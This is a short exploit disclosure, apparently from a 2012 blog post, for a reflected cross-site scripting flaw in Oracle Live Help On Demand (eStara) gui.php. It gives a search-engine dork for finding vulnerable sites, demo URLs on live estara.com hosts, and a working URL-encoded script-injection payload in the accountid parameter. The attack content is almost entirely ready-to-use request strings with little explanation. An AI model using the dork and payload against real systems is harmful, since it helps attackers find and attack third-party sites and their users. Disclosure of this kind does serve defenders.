# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks:inurl:UI/gui.php
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html
..................................................................
Demo:
http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here]
http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034
or
https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25×tamp=1321973587
http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.